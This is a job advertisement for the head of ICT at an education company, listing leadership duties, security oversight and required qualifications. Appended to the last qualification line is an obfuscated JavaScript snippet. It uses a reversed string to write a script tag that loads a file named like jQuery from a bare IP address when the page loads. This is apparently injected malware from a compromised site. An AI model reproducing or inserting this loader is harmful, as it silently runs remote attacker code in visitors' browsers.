Industry : Education
a) General Job Accountabilities:
Responsible for the overall leadership and oversight of the following ICT areas:
– Developing and implementing LE’s ICT blueprint
– Infrastructure – Server, Hardware
– ICT Helpdeck
– ICT security, disaster recover and ICT protection
– Applications – including website, portal, and functional applications in the areas of Finance, HR, Operations and Education
b) Primary Responsibilities:
Leadership and oversight includes:
– Strategic implementation of these functions and ensuring alignment to business strategy and direction
– Planning, co-ordination and management of the daily operational functions of these areas
– Continuous improvement in driving excellence in the systems, processes, risk management and deliverables for these areas
– Develop a cohesive and strong team across these functions who are capable to lead and become trusted business partners and subject matter expert
Specifically, this includes:
– Overseeing all ICT implementation projects for the company, in partnership with user departments.
– Overseeing implementation and on-going maintenance of ICT applications, including reporting and developing risk mitigation strategies.
– Overseeing security of data from internal and external attack, and prevention from any unknown users.
– Designing problem determination/resolution processes which meets business needs
– Overseeing the ICT asset management of the company
– Create awareness of an approapriate ICT culture and inculcate and embed that culture into the Company’s overall learning culture
– Manage external relationships with ICT vendors including optimising and maximising value and ROI from ICT for the company
– Responsible to drive full compliance to Quality Management System and ensure Retention of Quality Certification
– Responsible to ensure that appropriate ICT audits are conducted and timely closures of all issues rose.
– Become the policy owner for ICT policy, procedures & practices pertaining to all ICT operations and technology matters to ensure consistency and transparency.
– Other tasks and responsibilities assigned from time to time.
– Minimum Degree in ICT with relevant majors
– Certificate in Programme Management and/or other relevant certification from accredited bodies
– Minimum 10 years of experiences in development, enhancing, monitoring and maintenance ICT infrastructure and software/hardware peripherals.
– Experience in developing, implementing and managing in-house and enterprise applications
– Experience in technical project implementation
– Experience in programming and market research with some experience in the Education industry.
– BS in computer science or a related field, or significant equivalent experience in Information Education
– Exceptional communication and organizational skills
– Advanced knowledge of HTML and experience with popular content management systems
– Must have strong skills in Photoshop, Fireworks, or equivalent application(s).
– Ability to manage multiple projects in a fast-paced, deadline-driven environment
– Proven ability to build consensus and work effectively within a cross-departmental team 3-5 years’ experience managing content and production for high traffic websites
– 2 years minimum Web programming experience, including PHP, ASP or JSP
– 1 year minimum experience working with relational database systems such as MySQL, MSSQL or Oracle and a good working knowledge of SQL
– Self-starter with strong self-management skills
– Ability to organize and manage multiple priorities document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))